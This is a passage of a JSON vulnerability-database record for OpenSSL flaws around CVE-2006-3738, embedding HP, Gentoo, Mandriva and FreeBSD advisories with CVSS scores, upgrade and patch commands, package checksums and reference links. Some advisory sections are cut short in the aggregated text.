 6.8\nCVE-2003-0542    (AV:L/AC:L/Au:N/C:C/I:C/A:C)        7.2\nCVE-2004-0492    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10.0\nCVE-2005-2491    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2005-3352    (AV:N/AC:M/Au:N/C:N/I:P/A:N)        4.3\nCVE-2005-3357    (AV:N/AC:H/Au:N/C:N/I:N/A:C)        5.4\nCVE-2006-2937    (AV:N/AC:L/Au:N/C:N/I:N/A:C)        7.8\nCVE-2006-2940    (AV:N/AC:L/Au:N/C:N/I:N/A:C)        7.8\nCVE-2006-3738    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10.0\nCVE-2006-3747    (AV:N/AC:H/Au:N/C:C/I:C/A:C)        7.6\nCVE-2006-3918    (AV:N/AC:M/Au:N/C:N/I:P/A:N)        4.3\nCVE-2006-4339    (AV:N/AC:M/Au:N/C:P/I:N/A:N)        4.3\nCVE-2006-4343    (AV:N/AC:M/Au:N/C:N/I:N/A:P)        4.3\nCVE-2007-5000    (AV:N/AC:M/Au:N/C:N/I:P/A:N)        4.3\nCVE-2007-6388    (AV:N/AC:M/Au:N/C:N/I:P/A:N)        4.3\nCVE-2008-0005    (AV:N/AC:M/Au:N/C:N/I:P/A:N)        4.3\nCVE-2009-1891    (AV:N/AC:M/Au:N/C:N/I:N/A:C)        7.1\nCVE-2009-3095    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2009-3291    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2009-3292    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2009-3293    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2009-3555    (AV:N/AC:M/Au:N/C:N/I:P/A:P)        5.8\nCVE-2010-0010    (AV:N/AC:M/Au:N/C:P/I:P/A:P)        6.8\n===========================================================\n             Information on CVSS is documented\n            in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has made the following software updates available to resolve these vulnerabilities. \n\nKit Name\n Location\n\nHP SWS V2.2 for OpenVMS Alpha and OpenVMS Integrity servers. \nHP System Management Homepage (SMH) versions prior to 2.1.7 running on Linux and Windows. \n\nBACKGROUND\n\n\nRESOLUTION\nHP has provided System Management Homepage (SMH) version 2.1.7 or subsequent for each platform to resolve this issue. \n--WfZ7S8PLGjBY9Voh\nContent-Type: text/plain; charset=us-ascii\nContent-Disposition: inline\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 200610-11\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                            http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n  Severity: High\n     Title: OpenSSL: Multiple vulnerabilities\n      Date: October 24, 2006\n      Bugs: #145510\n        ID: 200610-11\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nOpenSSL contains multiple vulnerabilities including the possible remote\nexecution of arbitrary code. Additionally Dr. Stephen N. \n\nResolution\n==========\n\nAll OpenSSL 0.9.8 users should upgrade to the latest version:\n\n    # emerge --sync\n    # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-0.9.8d\"\n\nAll OpenSSL 0.9.7 users should upgrade to the latest version:\n\n    # emerge --sync\n    # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-0.9.7l\"\n\nReferences\n==========\n\n  [ 1 ] CVE-2006-2937\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\n  [ 2 ] CVE-2006-2940\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\n  [ 3 ] CVE-2006-3738\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n  [ 4 ] CVE-2006-4343\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n  http://security.gentoo.org/glsa/glsa-200610-11.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttp://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2006 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. (CVE-2006-4343)\n\n Updated packages are patched to address these issues. \n _______________________________________________________________________\n\n References:\n \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\n _______________________________________________________________________\n \n Updated Packages:\n \n Mandriva Linux 2006.0:\n 17e2d82c3f6c0afbf48eccbfbcc17b55  2006.0/i586/libopenssl0.9.7-0.9.7g-2.4.20060mdk.i586.rpm\n 8c3f89e1900f069d4a4ad3162a9f7d78  2006.0/i586/libopenssl0.9.7-devel-0.9.7g-2.4.20060mdk.i586.rpm\n 3a68c653ba0339ba99162459385c72e2  2006.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.4.20060mdk.i586.rpm\n 8291bde3bd9aa95533aabc07280203b8  2006.0/i586/openssl-0.9.7g-2.4.20060mdk.i586.rpm \n 52b3fbfc1389bcd73e406d6ff741e9dc  2006.0/SRPMS/openssl-0.9.7g-2.4.20060mdk.src.rpm\n\n Mandriva Linux 2006.0/X86_64:\n b2ce6e6bb7e3114663d3a074d0cc7da5  2006.0/x86_64/lib64openssl0.9.7-0.9.7g-2.4.20060mdk.x86_64.rpm\n f7c8dbc2eda0c90547d43661454d1068  2006.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.4.20060mdk.x86_64.rpm\n 7c9ebd9f9179f4e93627dcf0f3442335  2006.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.4.20060mdk.x86_64.rpm\n 17e2d82c3f6c0afbf48eccbfbcc17b55  2006.0/x86_64/libopenssl0.9.7-0.9.7g-2.4.20060mdk.i586.rpm\n 8c3f89e1900f069d4a4ad3162a9f7d78  2006.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.4.20060mdk.i586.rpm\n 3a68c653ba0339ba99162459385c72e2  2006.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.4.20060mdk.i586.rpm\n 6ce5832a59b8b67425cb7026ea9dc876  2006.0/x86_64/openssl-0.9.7g-2.4.20060mdk.x86_64.rpm \n 52b3fbfc1389bcd73e406d6ff741e9dc  2006.0/SRPMS/openssl-0.9.7g-2.4.20060mdk.src.rpm\n\n Mandriva Linux 2007.0:\n 1bfeff47c8d2f6c020c459881be68207  2007.0/i586/libopenssl0.9.8-0.9.8b-2.1mdv2007.0.i586.rpm\n 1e1a4db54ddfaedb08a6d847422099ff  2007.0/i586/libopenssl0.9.8-devel-0.9.8b-2.1mdv2007.0.i586.rpm\n 59c80405f33b2e61ffd3cef025635e21  2007.0/i586/libopenssl0.9.8-static-devel-0.9.8b-2.1mdv2007.0.i586.rpm\n 3a6657970a2e7661bd869d221a69c8da  2007.0/i586/openssl-0.9.8b-2.1mdv2007.0.i586.rpm \n aad29e57ddceb66105af5d6434de9a62  2007.0/SRPMS/openssl-0.9.8b-2.1mdv2007.0.src.rpm\n\n Mandriva Linux 2007.0/X86_64:\n af679c647d97214244a8423dc1a766b7  2007.0/x86_64/lib64openssl0.9.8-0.9.8b-2.1mdv2007.0.x86_64.rpm\n d7b1ed07df4115b3bcc3907e00d25a89  2007.0/x86_64/lib64openssl0.9.8-devel-0.9.8b-2.1mdv2007.0.x86_64.rpm\n 5bd3ece2c0ec7a3201c29fa84e25a75a  2007.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8b-2.1mdv2007.0.x86_64.rpm\n 9b028020dba009eddbf06eeb8607b87f  2007.0/x86_64/openssl-0.9.8b-2.1mdv2007.0.x86_64.rpm \n aad29e57ddceb66105af5d6434de9a62  2007.0/SRPMS/openssl-0.9.8b-2.1mdv2007.0.src.rpm\n\n Corporate 3.0:\n c99ea58f6f4959a4c36398cc6b2b4ee2  corporate/3.0/i586/libopenssl0.9.7-0.9.7c-3.6.C30mdk.i586.rpm\n 98a925c5ba2ecc9d704b1e730035755e  corporate/3.0/i586/libopenssl0.9.7-devel-0.9.7c-3.6.C30mdk.i586.rpm\n 151493a50693e3b9cc67bfafadb9ce42  corporate/3.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.6.C30mdk.i586.rpm\n 82b4709bdbb9128746887013a724356a  corporate/3.0/i586/openssl-0.9.7c-3.6.C30mdk.i586.rpm \n a5bdbe6afa52005a734dc18aa951677d  corporate/3.0/SRPMS/openssl-0.9.7c-3.6.C30mdk.src.rpm\n\n Corporate 3.0/X86_64:\n 01a922d80d6fc9d1b36dde15ee27747e  corporate/3.0/x86_64/lib64openssl0.9.7-0.9.7c-3.6.C30mdk.x86_64.rpm\n 30268f0b70862d1f5998694ac8b4addc  corporate/3.0/x86_64/lib64openssl0.9.7-devel-0.9.7c-3.6.C30mdk.x86_64.rpm\n e0388ff1efa34ea55d033e95b4e9bb63  corporate/3.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7c-3.6.C30mdk.x86_64.rpm\n c99ea58f6f4959a4c36398cc6b2b4ee2  corporate/3.0/x86_64/libopenssl0.9.7-0.9.7c-3.6.C30mdk.i586.rpm\n 83759622f0cc8ea9c0f6d32671283354  corporate/3.0/x86_64/openssl-0.9.7c-3.6.C30mdk.x86_64.rpm \n a5bdbe6afa52005a734dc18aa951677d  corporate/3.0/SRPMS/openssl-0.9.7c-3.6.C30mdk.src.rpm\n\n Corporate 4.0:\n 6d71d2358738be9967b2dfe19d3642f1  corporate/4.0/i586/libopenssl0.9.7-0.9.7g-2.4.20060mlcs4.i586.rpm\n 22890554d3096ce596eeec7393ee3fcf  corporate/4.0/i586/libopenssl0.9.7-devel-0.9.7g-2.4.20060mlcs4.i586.rpm\n 679fe740859fa35b2bb77b19c4a0e787  corporate/4.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.4.20060mlcs4.i586.rpm\n d8477333b67ec3a36ba46c50e6183993  corporate/4.0/i586/openssl-0.9.7g-2.4.20060mlcs4.i586.rpm \n b65dbbd9fb3d74d302478640476a2cd2  corporate/4.0/SRPMS/openssl-0.9.7g-2.4.20060mlcs4.src.rpm\n\n Corporate 4.0/X86_64:\n 746e5e916d1e05379373138a5db20923  corporate/4.0/x86_64/lib64openssl0.9.7-0.9.7g-2.4.20060mlcs4.x86_64.rpm\n a2b1d750075a32fe8badbdf1f7febafe  corporate/4.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.4.20060mlcs4.x86_64.rpm\n 47c464cf890a004f772c1db3e839fa12  corporate/4.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.4.20060mlcs4.x86_64.rpm\n 6d71d2358738be9967b2dfe19d3642f1  corporate/4.0/x86_64/libopenssl0.9.7-0.9.7g-2.4.20060mlcs4.i586.rpm\n 22890554d3096ce596eeec7393ee3fcf  corporate/4.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.4.20060mlcs4.i586.rpm\n 679fe740859fa35b2bb77b19c4a0e787  corporate/4.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.4.20060mlcs4.i586.rpm\n 1030a6124a9fa4fd5a41bdff077301bf  corporate/4.0/x86_64/openssl-0.9.7g-2.4.20060mlcs4.x86_64.rpm \n b65dbbd9fb3d74d302478640476a2cd2  corporate/4.0/SRPMS/openssl-0.9.7g-2.4.20060mlcs4.src.rpm\n\n Multi Network Firewall 2.0:\n 19055eda58e1f75814e594ce7709a710  mnf/2.0/i586/libopenssl0.9.7-0.9.7c-3.6.M20mdk.i586.rpm\n abfe548617969f619aec5b0e807f1f67  mnf/2.0/i586/libopenssl0.9.7-devel-0.9.7c-3.6.M20mdk.i586.rpm\n 92e7515c9125367a79fdb490f5b39cd4  mnf/2.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.6.M20mdk.i586.rpm\n 847eecb1d07e4cab3d1de1452103c3a0  mnf/2.0/i586/openssl-0.9.7c-3.6.M20mdk.i586.rpm \n b6b67fa82d7119cde7ab7816aed17059  mnf/2.0/SRPMS/openssl-0.9.7c-3.6.M20mdk.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.2.2 (GNU/Linux)\n\niD8DBQFFHA4hmqjQ0CJFipgRApknAJ9Ybd8xjfkR+RL1fWEI2Fgn/KIuqACeOH/0\nwB09L3fylyiHgrXvSV6VL7A=\n=/+dm\n-----END PGP SIGNATURE-----\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=============================================================================\nFreeBSD-SA-07:08.openssl                                    Security Advisory\n                                                          The FreeBSD Project\n\nTopic:          Buffer overflow in OpenSSL SSL_get_shared_ciphers()\n\nCategory:       contrib\nModule:         openssl\nAnnounced:      2007-10-03\nCredits:        Moritz Jodeit\nAffects:        All FreeBSD releases. \nCorrected:      2007-10-03 21:39:43 UTC (RELENG_6, 6.2-STABLE)\n                2007-10-03 21:40:35 UTC (RELENG_6_2, 6.2-RELEASE-p8)\n                2007-10-03 21:41:22 UTC (RELENG_6_1, 6.1-RELEASE-p20)\n                2007-10-03 21:42:00 UTC (RELENG_5, 5.5-STABLE)\n                2007-10-03 21:42:32 UTC (RELENG_5_5, 5.5-RELEASE-p16)\nCVE Name:       CVE-2007-5135\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:http://security.FreeBSD.org/\u003e. \n\nI.   Background\n\nFreeBSD includes software from the OpenSSL Project.  The OpenSSL Project is\na collaborative effort to develop a robust, commercial-grade, full-featured,\nand Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols as well as a full-strength\ngeneral purpose cryptography library. \n\nII.  Problem Description\n\nA buffer overflow addressed in FreeBSD-SA-06:23.openssl has been found\nto be incorrectly fixed. \n\nIII. \n\nIV.  Workaround\n\nNo workaround is available, but only applications using the\nSSL_get_shared_ciphers() function are affected. \n\nV.   Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to 5-STABLE, or 6-STABLE, or to the\nRELENG_6_2, RELENG_6_1, or RELENG_5_5 security branch dated after the\ncorrection date. \n\n2) To patch your present system:\n\nThe following patch have been verified to apply to FreeBSD 5.5, 6.1,\nand 6.2 systems. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n# fetch http://security.FreeBSD.org/patches/SA-07:08/openssl.patch\n# fetch http://security.FreeBSD.org/patches/SA-07:08/openssl.patch.asc\n\nb) Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n# cd /usr/src/secure/lib/libssl\n# make obj \u0026\u0026 make depend \u0026\u0026 make \u0026\u0026 make install\n\nVI.  Correction details\n\nThe following list contains the revision numbers of each file that was\ncorrected in FreeBSD. \n\nBranch                                                           Revision\n  Path\n- -------------------------------------------------------------------------\nRELENG_5\n  src/crypto/openssl/ssl/ssl_lib.c                           1.1.1.11.2.3\nRELENG_5_5\n  src/UPDATING                                            1.342.2.35.2.16\n  src/sys/conf/newvers.sh                                  1.62.2.21.2.18\n  src/crypto/openssl/ssl/ssl_lib.c                       1.1.1.11.2.1.4.2\nRELENG_6\n  src/crypto/openssl/ssl/ssl_lib.c                           1.1.1.12.2.2\nRELENG_6_2\n  src/UPDATING                                            1.416.2.29.2.11\n  src/sys/conf/newvers.sh                                  1.69.2.13.2.11\n  src/crypto/openssl/ssl/ssl_lib.c                       1.1.1.12.2.1.2.1\nRELENG_6_1\n  src/UPDATING                                            1.416.2.22.2.22\n  src/sys/conf/newvers.sh                                  1.69.2.11.2.22\n  src/crypto/openssl/ssl/ssl_lib.c                           1.1.1.12.6.2\n- -------------------------------------------------------------------------\n\nVII",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          },
          {
            "db": "CERT/CC",
            "id": "VU#221788"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "BID",
            "id": "22083"
          },
          {
            "db": "PACKETSTORM",
            "id": "59899"
          },
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "db": "PACKETSTORM",
            "id": "101257"
          },
          {
            "db": "PACKETSTORM",
            "id": "58346"
          },
          {
            "db": "PACKETSTORM",
            "id": "51324"
          },
          {
            "db": "PACKETSTORM",
            "id": "50548"
          },
          {
            "db": "PACKETSTORM",
            "id": "59797"
          }
        ],
        "trust": 5.85
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2006-3738",
            "trust": 3.9
          },
          {
            "db": "BID",
            "id": "22083",
            "trust": 3.7
          },
          {
            "db": "BID",
            "id": "20249",
            "trust": 2.9
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300",
            "trust": 2.9
          },
          {
            "db": "SECUNIA",
            "id": "23280",
            "trust": 2.6
          },
          {
            "db": "SECUNIA",
            "id": "23309",
            "trust": 2.6
          },
          {
            "db": "SECUNIA",
            "id": "22130",
            "trust": 2.6
          },
          {
            "db": "SECUNIA",
            "id": "22207",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22212",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22116",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22216",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22220",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22330",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22240",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22259",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22260",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22165",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22166",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22172",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22284",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22186",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22193",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22094",
            "trust": 1.8
          },
          {
            "db": "SECTRACK",
            "id": "1016943",
            "trust": 1.8
          },
          {
            "db": "USCERT",
            "id": "TA06-333A",
            "trust": 1.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#221788",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "30161",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "26329",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "24930",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "30124",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22500",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22799",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22298",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "31492",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23038",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22460",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23915",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22385",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23155",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22487",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22654",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23680",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22626",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23794",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22633",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22772",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "24950",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "25889",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22544",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23340",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22791",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22758",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-1401",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-0343",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3902",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3869",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3860",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4401",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4314",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-2315",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4264",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4036",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4417",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4750",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3820",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-2783",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3936",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4443",
            "trust": 1.0
          },
          {
            "db": "SECTRACK",
            "id": "1017522",
            "trust": 1.0
          },
          {
            "db": "OSVDB",
            "id": "29262",
            "trust": 1.0
          },
          {
            "db": "BID",
            "id": "20246",
            "trust": 0.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#386964",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "21709",
            "trust": 0.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620",
            "trust": 0.8
          },
          {
            "db": "XF",
            "id": "29237",
            "trust": 0.8
          },
          {
            "db": "USCERT",
            "id": "SA06-333A",
            "trust": 0.8
          },
          {
            "db": "USCERT",
            "id": "TA07-017A",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594",
            "trust": 0.8
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2022.0696",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "59899",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "50535",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "59797",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "50560",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "53990",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "101257",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "58346",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "51324",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "50548",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#221788"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "BID",
            "id": "22083"
          },
          {
            "db": "PACKETSTORM",
            "id": "59899"
          },
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "PACKETSTORM",
            "id": "59797"
          },
          {
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "db": "PACKETSTORM",
            "id": "101257"
          },
          {
            "db": "PACKETSTORM",
            "id": "58346"
          },
          {
            "db": "PACKETSTORM",
            "id": "51324"
          },
          {
            "db": "PACKETSTORM",
            "id": "50548"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "id": "VAR-200110-0190",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.28107159000000004
      },
      "last_update_date": "2025-10-01T22:48:27.726000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Critical Patch Update - January 2007",
            "trust": 0.8,
            "url": "http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html"
          },
          {
            "title": "HPSBUX02174",
            "trust": 0.8,
            "url": "http://www2.itrc.hp.com/service/cki/docDisplay.do?docId=c00805100"
          },
          {
            "title": "HPSBUX02174",
            "trust": 0.8,
            "url": "http://h50221.www5.hp.com/upassist/itrc_japan/assist2/secbltn/HP-UX/HPSBUX02174.html"
          },
          {
            "title": "openssl (V2.x)",
            "trust": 0.8,
            "url": "http://www.miraclelinux.com/support/update/list.php?errata_id=1003"
          },
          {
            "title": "openssl (V4.0)",
            "trust": 0.8,
            "url": "http://www.miraclelinux.com/support/update/list.php?errata_id=459"
          },
          {
            "title": "secadv_20060928",
            "trust": 0.8,
            "url": "http://www.openssl.org/news/secadv_20060928.txt"
          },
          {
            "title": "RHSA-2006:0695",
            "trust": 0.8,
            "url": "https://rhn.redhat.com/errata/RHSA-2006-0695.html"
          },
          {
            "title": "102711",
            "trust": 0.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102711-1"
          },
          {
            "title": "readme_iwss11_sol_patch7_b1182",
            "trust": 0.8,
            "url": "http://www.trendmicro.com/ftp/jp/ucmodule/iwss/sol/11/readme_iwss11_sol_patch7_b1182.txt"
          },
          {
            "title": "TLSA-2006-33",
            "trust": 0.8,
            "url": "http://www.turbolinux.com/security/2006/TLSA-2006-33.txt"
          },
          {
            "title": "TLSA-2007-52",
            "trust": 0.8,
            "url": "http://www.turbolinux.com/security/2007/TLSA-2007-52.txt"
          },
          {
            "title": "Critical Patch Update - January 2007",
            "trust": 0.8,
            "url": "http://otn.oracle.co.jp/security/070119_77/top.html"
          },
          {
            "title": "RHSA-2006:0695",
            "trust": 0.8,
            "url": "http://www.jp.redhat.com/support/errata/RHSA/RHSA-2006-0695J.html"
          },
          {
            "title": "TLSA-2006-33",
            "trust": 0.8,
            "url": "http://www.turbolinux.co.jp/security/2006/TLSA-2006-33j.txt"
          },
          {
            "title": "TLSA-2007-52",
            "trust": 0.8,
            "url": "http://www.turbolinux.co.jp/security/2007/TLSA-2007-52j.txt"
          },
          {
            "title": "vu386964-547300",
            "trust": 0.8,
            "url": "http://software.fujitsu.com/jp/security/vulnerabilities/vu386964-547300.html"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
